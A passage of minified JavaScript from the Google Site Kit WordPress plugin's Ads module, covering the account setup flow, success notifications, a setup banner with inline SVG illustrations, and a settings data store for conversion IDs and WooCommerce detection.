e(C.oR).getConnectURL({additionalScopes:[j,"https://www.googleapis.com/auth/supportcontent"],redirectURL:t})}),m=(0,n.useSelect)(e=>!!u&&e(Me.M).isNavigatingTo(u)),{triggerSurvey:y}=(0,n.useDispatch)(C.oR),{navigateTo:f}=(0,n.useDispatch)(Me.M),{setPaxConversionID:v,setCustomerID:S,setExtCustomerID:b,setFormattedExtCustomerID:N,setUserID:x,setAccountOverviewURL:D,submitChanges:T}=(0,n.useDispatch)(k);(0,Re.A)(()=>{ae===a&&r(re)});const{setConversionTrackingEnabled:_,saveConversionTrackingSettings:E}=(0,n.useDispatch)(A.O4),R=(0,Ee.l6)(async()=>{if(!l?.current)return;const{accountService:e,conversionTrackingIdService:t}=l.current.getServices(),i=await e.getAccountId({}),o=await e.getGoogleAdsUrl({}),s=await t.getConversionTrackingId({});if(!i.externalCustomerId&&!s.conversionTrackingId)return;(0,pe.sx)(`${c}_pax`,"pax_campaign_created"),y("pax_campaign_created"),x(i.userId),S(i.customerId),b(i.externalCustomerId),N(i.formattedExternalCustomerId),v(s.conversionTrackingId),D(o.accountOverviewUrl);const{error:n}=await T();n||(_(!0),await E())},[b,v,c]),L=(0,n.useRegistry)(),P=(0,Ee.l6)(async()=>{const{select:t,resolveSelect:i}=L;await i(A.O4).getSiteInfo();const o=t(A.O4).getAdminURL("googlesitekit-dashboard",{notification:le});await Promise.all([(0,pe.sx)(`${c}_pax`,"pax_setup_completed"),y("pax_setup_completed")]),e(o)},[L,e,c]),G=(0,n.useSelect)(e=>e(k).isWooCommerceRedirectModalDismissed()),z=(0,n.useSelect)(e=>e(k).isWooCommerceActivated()),U=(0,n.useSelect)(e=>{const t=e(k).hasGoogleForWooCommerceAdsAccount(),i=e(k).isGoogleForWooCommerceActivated();return z&&i&&t}),W=(0,I.useCallback)(()=>{d?r(re):f(u)},[f,r,d,u]),H=(0,I.useCallback)(e=>{(0,pe.sx)(`${c}_pax`,"pax_launch"),y("pax_launch"),l.current=e},[c,y]),Y=(0,I.useCallback)(async()=>{!z||G?(await Promise.all([(0,pe.sx)(c,"start_setup_pax"),y("start_setup_pax")]),W()):o(!0)},[y,z,G,o,W,c]),Q=(0,n.useSelect)(e=>e(A.O4).getDocumentationLinkURL("ads-set-up-a-new-ads-account")),V=(0,n.useSelect)(e=>e(A.O4).getDocumentationLinkURL("ads-connect-an-existing-ads-account"));return(0,O.jsxs)("div",{className:M()("googlesitekit-setup-module","googlesitekit-setup-module--ads",{"has-pax-flow":!g&&re===a&&d}),children:[(0,O.jsxs)("div",{className:"googlesitekit-setup-module__step",children:[(0,O.jsx)("div",{className:"googlesitekit-setup-module__logo",children:(0,O.jsx)(h,{width:"40",height:"40"})}),(0,O.jsx)(B.A,{as:"h3",size:"small",type:"headline",className:"googlesitekit-setup-module__title",children:(0,p._x)("Ads","Service name","google-site-kit")})]}),(0,O.jsxs)("div",{className:"googlesitekit-setup-module__step",children:[(0,O.jsx)(Z.A,{moduleSlug:"ads"}),!g&&re===a&&d&&(0,O.jsx)(Pe.fI,{children:(0,O.jsx)(Pe.fh,{mdSize:12,lgSize:12,children:(0,O.jsx)(PAXEmbeddedApp,{displayMode:"setup",onLaunch:H,onCampaignCreated:R,onFinishAndCloseSignUpFlow:P})})}),!g&&(!a||!d)&&(0,O.jsxs)(Pe.fI,{className:"googlesitekit-setup-module--ads--setup-container",children:[(0,O.jsxs)(Pe.fh,{smSize:8,mdSize:8,lgSize:5,className:"align-top",children:[(0,O.jsx)(B.A,{as:"h3",type:"headline",size:"small",children:(0,p.__)("Set up a new Ads account","google-site-kit")}),(0,O.jsx)("p",{className:"instructions",children:(0,w.A)((0,p.__)("Create your first Ads campaign, add billing information, and choose your conversion goals. To create a new Ads account, you’ll need to grant Site Kit additional permissions during the account creation process. <a>Learn more</a>","google-site-kit"),{a:(0,O.jsx)(Ce.A,{href:Q,external:!0})})}),(0,O.jsx)(F.SpinnerButton,{onClick:Y,disabled:m,isSaving:m,children:(0,p.__)("Start setup","google-site-kit")})]}),(0,O.jsxs)(Pe.fh,{className:"divider",smSize:8,mdSize:8,lgSize:2,children:[(0,O.jsx)("span",{className:"divider-line"}),(0,O.jsx)("span",{className:"divider-label",children:(0,p.__)("OR","google-site-kit")})]}),(0,O.jsxs)(Pe.fh,{smSize:8,mdSize:8,lgSize:5,children:[(0,O.jsx)(B.A,{as:"h3",type:"headline",size:"small",children:(0,p.__)("Connect an existing Ads account","google-site-kit")}),(0,O.jsx)("p",{className:"instructions",children:(0,w.A)((0,p.__)("To track conversions for your Ads campaign, you need to add your Conversion ID to Site Kit. You can always change the Conversion ID later in Site Kit Settings. <a>Learn more</a>","google-site-kit"),{a:(0,O.jsx)(Ce.A,{href:V,external:!0}),br:(0,O.jsx)("br",{})})}),(0,O.jsx)(SetupFormPAX,{finishSetup:e,isNavigatingToOAuthURL:m})]})]})]}),t&&(0,O.jsx)(WooCommerceRedirectModal,{onClose:U?null:()=>o(!1),onContinue:W,dialogActive:!0})]})}SetupMainPAX.defaultProps={finishSetup:()=>{}};var Oe=i(84895),Ge=i(35470);function PAXSetupSuccessSubtleNotification({id:e,Notification:t}){const{dismissNotification:i}=(0,n.useDispatch)(ke.D),[,o]=(0,Le.A)("notification"),s=(0,I.useCallback)(()=>{o(void 0)},[o]),r=(0,Ge.A)(e=>{const t=e(k).getAccountOverviewURL();return t?e(C.oR).getAccountChooserURL(t):null}),a=(0,I.useCallback)(()=>{s(),i(e)},[s,i,e]);return(0,O.jsx)(t,{children:(0,O.jsx)(P.A,{notificationID:e,type:R.Q.SUCCESS,title:(0,p.__)("Your Ads campaign was successfully set up!","google-site-kit"),description:(0,p.__)("Track your conversions, measure your campaign results and make the most of your ad spend","google-site-kit"),dismissButton:{onClick:s},ctaButton:{onClick:a,label:(0,p.__)("Show me","google-site-kit"),href:r,external:!0}})})}function SetupSuccessSubtleNotification({id:e,Notification:t}){const[,i]=(0,Le.A)("notification"),[,o]=(0,Le.A)("slug");return(0,O.jsx)(t,{children:(0,O.jsx)(P.A,{notificationID:e,type:R.Q.SUCCESS,title:(0,p.__)("Success! Your Conversion ID was added to your site","google-site-kit"),description:(0,p.__)("You can now track conversions for your Ads campaigns","google-site-kit"),dismissButton:{onClick:function(){i(void 0),o(void 0)}}})})}function AccountLinkedViaGoogleForWooCommerceSubtleNotification({id:e,Notification:t}){const[i,o]=(0,I.useState)(!1),s=(0,be.A)(fe.I),{dismissNotification:r}=(0,n.useDispatch)(ke.D),{setCacheItem:a}=(0,n.useDispatch)(A.O4),l=(0,I.useCallback)(async()=>{await a(v,!0,{ttl:5*pe.r0})},[a]),c=(0,I.useCallback)(async()=>{o(!0),await r(e,{skipHidingFromQueue:!0}),await l(),await s()},[o,l,r,e,s]),g=(0,I.useCallback)(async()=>{o(!0),await r(e),await l()},[o,r,l,e]);return(0,O.jsx)(t,{children:(0,O.jsx)(P.A,{notificationID:e,type:"new",description:(0,p.__)("We’ve detected an existing Ads account via the Google for WooCommerce plugin. You can still create a new Ads account using Site Kit.","google-site-kit"),dismissButton:{label:(0,p.__)("Create new account","google-site-kit"),onClick:c,disabled:i},ctaButton:{label:(0,p.__)("Keep existing account","google-site-kit"),onClick:g,disabled:i}})})}PAXSetupSuccessSubtleNotification.propTypes={id:T().string.isRequired,Notification:T().elementType.isRequired},SetupSuccessSubtleNotification.propTypes={id:T().string.isRequired,Notification:T().elementType.isRequired},AccountLinkedViaGoogleForWooCommerceSubtleNotification.propTypes={id:T().string.isRequired,Notification:T().elementType.isRequired};var ze=i(17443),Ze=i(72050);var Ue=i(89065);function AdsModuleSetupCTABanner({id:e,Notification:t}){const[i,o]=(0,I.useState)(!1),[s,r]=(0,I.useState)(!1),a=(0,n.useSelect)(e=>e(A.O4).getDocumentationLinkURL("set-up-ads")),l=(0,n.useSelect)(e=>e(C.oR).isAdBlockerActive()),c=(0,n.useSelect)(t=>t(ke.D).isNotificationDismissalFinal(e)),g=(0,n.useSelect)(e=>{const{isWooCommerceActivated:t,isGoogleForWooCommerceActivated:i,hasGoogleForWooCommerceAdsAccount:o}=e(k);return t()&&i()&&!o()||t()&&!i()}),d=(0,n.useSelect)(e=>e(k).isWooCommerceRedirectModalDismissed()),{dismissNotification:u}=(0,n.useDispatch)(ke.D),{setCacheItem:m}=(0,n.useDispatch)(A.O4),y=(0,I.useCallback)(()=>{m(v,!0,{ttl:5*pe.r0})},[m]),h=(0,be.A)(fe.I),{triggerSurvey:f}=(0,n.useDispatch)(C.oR),M=(0,I.useCallback)(()=>{if(f("accept_ads_setup_cta"),!g||d)return r(!0),void h();o(!0)},[f,g,h,d]),j=(0,I.useCallback)(()=>{o(!1)},[o]),S={tooltipSlug:"ads-setup-notification",content:(0,p.__)("You can always enable Ads in Settings later","google-site-kit"),dismissLabel:(0,p.__)("Got it","google-site-kit")},b=(0,ze.i)(S),[N,x]=(0,I.useState)((0,p.__)("Maybe later","google-site-kit"));return(0,Re.A)(()=>{!0===c&&x((0,p.__)("Don’t show again","google-site-kit"))}),(0,O.jsxs)(t,{children:[(0,O.jsx)(Ze.A,{notificationID:e,title:(0,p.__)("Get better quality leads and enhance conversions with Ads","google-site-kit"),description:(0,O.jsxs)(I.Fragment,{children:[(0,w.A)((0,p.__)("Help drive sales, leads, or site traffic by getting your business in front of people who are actively searching Google for products or services you offer. <a />","google-site-kit"),{a:(0,O.jsx)(L.A,{id:e,label:(0,p.__)("Learn more","google-site-kit"),url:a})}),l&&(0,O.jsx)(Z.A,{moduleSlug:"ads"})]}),ctaButton:{label:(0,p.__)("Set up Ads","google-site-kit"),onClick:M,disabled:l||s||i,inProgress:s,dismissOnClick:!0,dismissOptions:{expiresInSeconds:2*pe.Du,skipHidingFromQueue:!0}},dismissButton:{label:N,onClick:b,disabled:s,dismissOptions:{expiresInSeconds:c?0:2*pe.Du}},svg:{desktop:"data:image/svg+xml;base64,<svg width="512" height="510" viewBox="0 0 512 510" fill="none" xmlns="http://www.w3.org/2000/svg">
<path d="M477.903 159.447C481.657 202.951 470.391 222.184 441.891 274.184C413.391 326.184 453.471 387.633 409.391 446.184C356.951 515.84 173.709 521.524 94.6518 492.523C15.5946 463.523 -4.79182 403.578 0.890568 348.684C8.60254 274.184 74.3473 250.016 94.6518 213.505C124.8 159.294 80.5681 103.272 138.927 59.7992C204.572 10.8994 250.384 78.7405 313.322 74.3222C349.633 71.7731 385.295 63.553 417.528 76.1754C450.112 88.935 474.96 124.841 477.903 159.447Z" fill="#B8E6CA"/>
<rect x="193.603" y="226.496" width="119" height="8" rx="4" fill="#F3F5F7"/>
<g filter="url(#filter0_d_1461_11838)">
<rect x="175.603" y="160.496" width="155" height="252" rx="20" fill="white"/>
<rect x="193.603" y="177.496" width="119" height="21" rx="4" fill="#F3F5F7"/>
<rect x="193.603" y="234.496" width="119" height="130" rx="4" fill="#F3F5F7"/>
<rect x="193.603" y="372.496" width="119" height="8" rx="4" fill="#F3F5F7"/>
<rect x="215.603" y="208.496" width="75" height="12" rx="6" fill="#F3F5F7"/>
<rect x="193.603" y="209.496" width="15" height="2" rx="1" fill="#DEE3E6"/>
<rect x="193.603" y="213.496" width="15" height="2" rx="1" fill="#DEE3E6"/>
<rect x="193.603" y="217.496" width="15" height="2" rx="1" fill="#DEE3E6"/>
<circle cx="367.848" cy="160.742" r="18" fill="#6380B8"/>
<circle cx="366.425" cy="158.878" r="4.84218" stroke="white" stroke-width="2.06528"/>
<path d="M369.777 162.975L373.848 167.782" stroke="white" stroke-width="2.06528" stroke-linecap="round" stroke-linejoin="round"/>
<circle cx="389.848" cy="210.742" r="14" fill="#6380B8"/>
<circle cx="388.741" cy="209.292" r="3.76614" stroke="white" stroke-width="2.06528"/>
<path d="M391.348 212.479L394.514 216.217" stroke="white" stroke-width="2.06528" stroke-linecap="round" stroke-linejoin="round"/>
<circle cx="85.8477" cy="334.742" r="25" fill="#6380B8"/>
<circle cx="83.8715" cy="332.153" r="6.72526" stroke="white" stroke-width="2.06528"/>
<path d="M88.5273 337.844L94.181 344.52" stroke="white" stroke-width="2.06528" stroke-linecap="round" stroke-linejoin="round"/>
<circle cx="414.848" cy="119.742" r="22" fill="#6380B8"/>
<circle cx="413.109" cy="117.464" r="5.91823" stroke="white" stroke-width="2.06528"/>
<path d="M417.206 122.472L422.181 128.347" stroke="white" stroke-width="2.06528" stroke-linecap="round" stroke-linejoin="round"/>
</g>
<g filter="url(#filter1_d_1461_11838)">
<path d="M148.603 258.496C148.603 254.078 152.184 250.496 156.603 250.496H239.603C244.021 250.496 247.603 254.078 247.603 258.496V295.496H148.603V258.496Z" fill="#9BB8F0"/>
<path d="M148.603 301.996H247.603V345.496C247.603 349.915 244.021 353.496 239.603 353.496H156.603C152.184 353.496 148.603 349.915 148.603 345.496V301.996Z" fill="white"/>
<rect x="148.603" y="295.496" width="99" height="19" fill="#F3F5F7"/>
<rect x="157.603" y="301.496" width="62" height="7" rx="3.5" fill="#DEE3E6"/>
<rect x="157.603" y="325.496" width="54" height="5" rx="2.5" fill="#EBEEF0"/>
<rect x="157.603" y="334.496" width="36" height="5" rx="2.5" fill="#EBEEF0"/>
<circle cx="230.603" cy="332.496" r="8" fill="#EBEEF0"/>
<path d="M229.46 329.068L232.888 332.496L229.46 335.925" stroke="white" stroke-width="2.28571" stroke-linecap="round" stroke-linejoin="round"/>
</g>
<g filter="url(#filter2_d_1461_11838)">
<path d="M258.603 258.496C258.603 254.078 262.184 250.496 266.603 250.496H349.603C354.021 250.496 357.603 254.078 357.603 258.496V295.496H258.603V258.496Z" fill="#9BB8F0"/>
<path d="M258.603 301.996H357.603V345.496C357.603 349.915 354.021 353.496 349.603 353.496H266.603C262.184 353.496 258.603 349.915 258.603 345.496V301.996Z" fill="white"/>
<rect x="258.603" y="295.496" width="99" height="19" fill="#F3F5F7"/>
<rect x="267.603" y="301.496" width="62" height="7" rx="3.5" fill="#DEE3E6"/>
<rect x="267.603" y="325.496" width="54" height="5" rx="2.5" fill="#EBEEF0"/>
<rect x="267.603" y="334.496" width="36" height="5" rx="2.5" fill="#EBEEF0"/>
<circle cx="340.603" cy="332.496" r="8" fill="#EBEEF0"/>
<path d="M339.46 329.068L342.888 332.496L339.46 335.925" stroke="white" stroke-width="2.28571" stroke-linecap="round" stroke-linejoin="round"/>
</g>
<defs>
<filter id="filter0_d_1461_11838" x="44.8477" y="85.7417" width="408" height="346.755" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="4"/>
<feGaussianBlur stdDeviation="8"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1461_11838"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1461_11838" result="shape"/>
</filter>
<filter id="filter1_d_1461_11838" x="132.603" y="242.496" width="131" height="135" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="8"/>
<feGaussianBlur stdDeviation="8"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1461_11838"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1461_11838" result="shape"/>
</filter>
<filter id="filter2_d_1461_11838" x="242.603" y="242.496" width="131" height="135" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="8"/>
<feGaussianBlur stdDeviation="8"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1461_11838"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1461_11838" result="shape"/>
</filter>
</defs>
</svg>
",mobile:"data:image/svg+xml;base64,<svg width="414" height="140" viewBox="0 0 414 140" fill="none" xmlns="http://www.w3.org/2000/svg">
<g clip-path="url(#clip0_1505_5192)">
<path d="M410.262 126.987C414.224 172.915 402.335 193.219 372.263 248.115C342.191 303.011 384.482 367.882 337.971 429.694C282.639 503.228 89.29 509.229 5.87238 478.613C-77.5452 447.998 -99.0561 384.715 -93.0603 326.764C-84.923 248.115 -32.5121 253.113 5.87238 184.057C44.2569 115 -12 76.5001 54.5 30C121 -16.5 170.194 41.7866 236.603 37.1222C274.917 34.4312 312.547 25.7533 346.557 39.0786C380.938 52.5489 407.157 90.4545 410.262 126.987Z" fill="#B8E6CA"/>
<rect x="171.086" y="28.0813" width="92.8667" height="6.24314" rx="3.12157" fill="#F3F5F7"/>
<g filter="url(#filter0_d_1505_5192)">
<rect x="166.526" y="6" width="101.986" height="165.81" rx="13.1595" fill="white"/>
<rect x="178.37" y="17.1855" width="78.2991" height="13.8175" rx="2.6319" fill="#F3F5F7"/>
<rect x="178.37" y="54.6902" width="78.2991" height="85.5369" rx="2.6319" fill="#F3F5F7"/>
<rect x="192.845" y="37.5828" width="49.3482" height="7.89571" rx="3.94786" fill="#F3F5F7"/>
<rect x="178.37" y="38.2407" width="9.86964" height="1.31595" rx="0.657976" fill="#DEE3E6"/>
<rect x="178.37" y="40.8726" width="9.86964" height="1.31595" rx="0.657976" fill="#DEE3E6"/>
<rect x="178.37" y="43.5046" width="9.86964" height="1.31595" rx="0.657976" fill="#DEE3E6"/>
<circle cx="342.302" cy="69.5451" r="14.0471" fill="#6380B8"/>
<circle cx="341.192" cy="68.0906" r="3.7788" stroke="white" stroke-width="1.61173"/>
<path d="M343.808 71.2881L346.984 75.0392" stroke="white" stroke-width="1.61173" stroke-linecap="round" stroke-linejoin="round"/>
<circle cx="359.47" cy="108.565" r="10.9255" fill="#6380B8"/>
<circle cx="358.607" cy="107.433" r="2.93907" stroke="white" stroke-width="1.61173"/>
<path d="M360.642 109.92L363.112 112.838" stroke="white" stroke-width="1.61173" stroke-linecap="round" stroke-linejoin="round"/>
<circle cx="86.9949" cy="92.5552" r="19.5098" fill="#6380B8"/>
<circle cx="85.4527" cy="90.5352" r="5.24834" stroke="white" stroke-width="1.61173"/>
<path d="M89.0859 94.9761L93.498 100.186" stroke="white" stroke-width="1.61173" stroke-linecap="round" stroke-linejoin="round"/>
<circle cx="378.98" cy="37.549" r="17.1686" fill="#6380B8"/>
<circle cx="377.623" cy="35.7714" r="4.61854" stroke="white" stroke-width="1.61173"/>
<path d="M380.821 39.6794L384.704 44.2642" stroke="white" stroke-width="1.61173" stroke-linecap="round" stroke-linejoin="round"/>
</g>
<g filter="url(#filter1_d_1505_5192)">
<path d="M135.969 53.0539C135.969 49.6059 138.764 46.8108 142.212 46.8108H206.984C210.432 46.8108 213.227 49.6059 213.227 53.0539V81.9284H135.969V53.0539Z" fill="#9BB8F0"/>
<path d="M135.969 87.001H213.227V120.948C213.227 124.396 210.432 127.191 206.984 127.191H142.212C138.764 127.191 135.969 124.396 135.969 120.948V87.001Z" fill="white"/>
<rect x="135.969" y="81.9285" width="77.2588" height="14.8275" fill="#F3F5F7"/>
<rect x="142.992" y="86.6108" width="48.3843" height="5.46274" rx="2.73137" fill="#DEE3E6"/>
<rect x="142.992" y="105.34" width="42.1412" height="3.90196" rx="1.95098" fill="#EBEEF0"/>
<rect x="142.992" y="112.364" width="28.0941" height="3.90196" rx="1.95098" fill="#EBEEF0"/>
<circle cx="199.961" cy="110.803" r="6.24314" fill="#EBEEF0"/>
<path d="M199.069 108.127L201.744 110.803L199.069 113.478" stroke="white" stroke-width="1.78375" stroke-linecap="round" stroke-linejoin="round"/>
</g>
<g filter="url(#filter2_d_1505_5192)">
<path d="M221.812 53.0539C221.812 49.6059 224.607 46.8108 228.055 46.8108H292.827C296.275 46.8108 299.07 49.6059 299.07 53.0539V81.9284H221.812V53.0539Z" fill="#9BB8F0"/>
<path d="M221.812 87.001H299.07V120.948C299.07 124.396 296.275 127.191 292.827 127.191H228.055C224.607 127.191 221.812 124.396 221.812 120.948V87.001Z" fill="white"/>
<rect x="221.812" y="81.9285" width="77.2588" height="14.8275" fill="#F3F5F7"/>
<rect x="228.835" y="86.6108" width="48.3843" height="5.46274" rx="2.73137" fill="#DEE3E6"/>
<rect x="228.835" y="105.34" width="42.1412" height="3.90196" rx="1.95098" fill="#EBEEF0"/>
<rect x="228.835" y="112.364" width="28.0941" height="3.90196" rx="1.95098" fill="#EBEEF0"/>
<circle cx="285.804" cy="110.803" r="6.24314" fill="#EBEEF0"/>
<path d="M284.912 108.127L287.588 110.803L284.912 113.478" stroke="white" stroke-width="1.78375" stroke-linecap="round" stroke-linejoin="round"/>
</g>
</g>
<defs>
<filter id="filter0_d_1505_5192" x="54.9988" y="-3.36471" width="353.636" height="190.783" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="3.12157"/>
<feGaussianBlur stdDeviation="6.24314"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_5192"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_5192" result="shape"/>
</filter>
<filter id="filter1_d_1505_5192" x="123.482" y="40.5677" width="102.231" height="105.353" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="6.24314"/>
<feGaussianBlur stdDeviation="6.24314"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_5192"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_5192" result="shape"/>
</filter>
<filter id="filter2_d_1505_5192" x="209.325" y="40.5677" width="102.231" height="105.353" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="6.24314"/>
<feGaussianBlur stdDeviation="6.24314"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_5192"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_5192" result="shape"/>
</filter>
<clipPath id="clip0_1505_5192">
<rect width="414" height="140" fill="white"/>
</clipPath>
</defs>
</svg>
",verticalPosition:"center"}}),i&&(0,O.jsx)(WooCommerceRedirectModal,{onDismiss:()=>u(e),onClose:j,onBeforeSetupCallback:y,dialogActive:!0}),(0,O.jsx)(Ue.A,{triggerID:"view_ads_setup_cta",ttl:pe.tt})]})}AdsModuleSetupCTABanner.propTypes={id:T().string.isRequired,Notification:T().elementType.isRequired};var We=i(84730),Be=i(20697),He=i(8084),Ye=i(46763);const Qe=l().createModuleStore(fe.I,{ownedSettingsSlugs:["conversionID","paxConversionID","extCustomerID","customerID","userID"],storeName:k,settingSlugs:["conversionID","ownerID","paxConversionID","customerID","extCustomerID","formattedExtCustomerID","userID","accountOverviewURL"],requiresSetup:!0,submitChanges:async function({select:e,dispatch:t}){if(e(k).haveSettingsChanged()){const{error:e}=await t(k).saveSettings();if(e)return{error:e}}if(e(A.O4).haveConversionTrackingSettingsChanged()){const{error:e}=await t(A.O4).saveConversionTrackingSettings();if(e)return{error:e}}if(e(A.O4).haveGoogleTagGatewaySettingsChanged()){const{error:i}=await t(A.O4).saveGoogleTagGatewaySettings();if(i)return{error:i};if(e(A.O4).isGoogleTagGatewayEnabled()&&!e(ke.D).isNotificationDismissed(We.rq)){const{error:e}=await t(ke.D).dismissNotification(We.rq)||{};if(e)return{error:e}}}return await(0,ue.invalidateCache)("modules",fe.I),await(0,ue.invalidateCache)("core","site","ads-measurement-status"),{}},rollbackChanges:function({select:e,dispatch:t}){e(k).haveSettingsChanged()&&(t(k).rollbackSettings(),t(A.O4).resetConversionTrackingSettings(),t(A.O4).resetGoogleTagGatewaySettings())},validateCanSubmitChanges:function(e){const t=(0,He.WI)(e),{isDoingSubmitChanges:i,haveSettingsChanged:o,getConversionID:s,getPaxConversionID:n}=t(k);oe()(!i(),Ye.mV),oe()(o(),Ye.Wq),oe()((0,J.EL)(s())||(0,J.EL)(n()),"a valid conversionID is required to submit changes")},validateHaveSettingsChanged:function(e,t,i){const{settings:o,savedSettings:s}=t,n=e(A.O4).haveConversionTrackingSettingsChanged(),r=e(A.O4).haveGoogleTagGatewaySettingsChanged();i&&oe()((0,se.isEqual)((0,se.pick)(o,i),(0,se.pick)(s,i))||!n||r,Ye.Wq),oe()(!(0,se.isEqual)(o,s)||n||r,Ye.Wq)}}),Fe={selectors:{getAdBlockerWarningMessage:(0,n.createRegistrySelector)(e=>()=>{const t=e(C.oR).isAdBlockerActive();if(void 0===t)return;if(!t)return null;return e(Te.i).isModuleConnected(fe.I)?(0,p.__)("To get the latest Ads data you will need to disable your Ad blocker","google-site-kit"):(0,p.__)("To set up Ads you will need to disable your Ad blocker","google-site-kit")})}};var Ve=i(65976);function Je(e){return(0,n.createRegistrySelector)(t=>()=>(t(k).getModuleData()||[])[e])}function Xe(e,t){return oe()(e,"propName is required."),oe()(t,"plugin is required."),oe()(N.includes(t),"Invalid plugin."),(0,n.createRegistrySelector)(i=>()=>{const{getPluginsData:o}=i(k);return((o()||[])[t]||[])[e]})}const Ke="RECEIVE_MODULE_DATA",qe={moduleData:{supportedConversionEvents:void 0,plugins:void 0}},$e={receiveModuleData:e=>(oe()(e,"moduleData is required."),{payload:e,type:Ke})},et=(0,n.createReducer)((e,{payload:t,type:i})=>{switch(i){case Ke:{const{supportedConversionEvents:i,plugins:o}=t,s={supportedConversionEvents:i,plugins:o};e.moduleData=s;break}}}),tt={*getModuleData(){const{resolveSelect:e}=yield n.commonActions.getRegistry(),t=yield n.commonActions.await(e(Te.i).getModuleInlineData(fe.I));t&&(yield $e.receiveModuleData(t))}},it={getModuleData:e=>e.moduleData,getSupportedConversionEvents:Je("supportedConversionEvents"),getPluginsData:Je("plugins"),isWooCommerceInstalled:Xe("installed",S),isWooCommerceActivated:Xe("active",S),isGoogleForWooCommerceInstalled:Xe("installed",b),isGoogleForWooCommerceActivated:Xe("active",b),hasGoogleForWooCommerceAdsAccount:Xe("adsConnected",b),getGoogleForWooCommerceConversionID:Xe("conversionID",b)},ot={initialState:qe,actions:$e,controls:Ve.ne,reducer:et,resolvers:tt,selectors:it};var st=i(49993);const nt="RECEIVE_WOOCOMMERCE_MODAL_CACHE_KEY",rt={receiveIsWooCommerceRedirectModalDismissed:e=>(oe()(void 0!==e,"A cacheHit is required."),{type:nt,payload:{cacheHit:e}})},at=(0,n.createReducer)((e,{type:t,payload:i})=>{if(t===nt)e.woocommerceModalDismissed=i.cacheHit}),lt={isWooCommerceRedirectModalDismissed:e=>e.woocommerceModalDismissed},ct={*isWooCommerceRedirectModalDismissed(){const{cacheHit:e}=yield n.commonActions.await((0,st.Gq)(v));yield rt.receiveIsWooCommerceRedirectModalDismissed(e||!1)}},gt={initialState:{woocommerceModalDismissed:!1},actions:rt,reducer:at,resolvers:ct,selectors:lt},dt={selectors:{getDetailsLinkURL:(0,n.createRegistrySelector)(e=>()=>{const t=e(k).getAccountOverviewURL();if(t)return e(C.oR).getAccountChooserURL(t);const i=e(Te.i).getModule(fe.I);return void 0!==i?null!==i&&i.homepage?e(C.oR).getAccountChooserURL(i.homepage):null:void 0})}},ut=(0,n.combineStores)(Qe,Fe,ot,gt,dt);ut.initialState,ut.actions,ut.controls,ut.reducer,ut.resolvers,ut.selectors;const pt={"setup-success-notification-ads":{Component:SetupSuccessSubtleNotification,areaSlug:We.bI.DASHBOARD_TOP,viewContexts:[Be.jU,Be.Ax],checkRequirements:()=>{const e=(0,m.d)(location.href,"notification"),t=(0,m.d)(location.href,"slug");return"authentication_success"===e&&t===fe.I}},"setup-success-notification-pax":{Component:PAXSetupSuccessSubtleNotification,areaSlug:We.bI.DASHBOARD_TOP,viewContexts:[Be.jU,Be.Ax],checkRequirements:()=>{const e=(0,m.d)(location.href,"notification");return 